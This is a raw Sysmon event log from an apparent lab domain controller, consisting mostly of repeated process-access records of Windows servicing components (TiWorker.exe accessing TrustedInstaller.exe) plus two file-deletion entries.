10341000x80000000000000006088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.901{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.901{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.901{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.901{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\f01b4d95cf55d32a.customDestinations-ms~RF1b08e.TMPMD5=B9BD716DE6739E51C620F2086F9C31E4,SHA256=7116FF028244A01F3D17F1D3BC2E1506BC9999C2E40E388458F0CCCC4E117312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.901{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=286586234FADE31358D2A59B684B0511,SHA256=819FB9368F0CBBABB35DE0FC07545C5F6B5B54456D140ADE91416B417D8AABFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
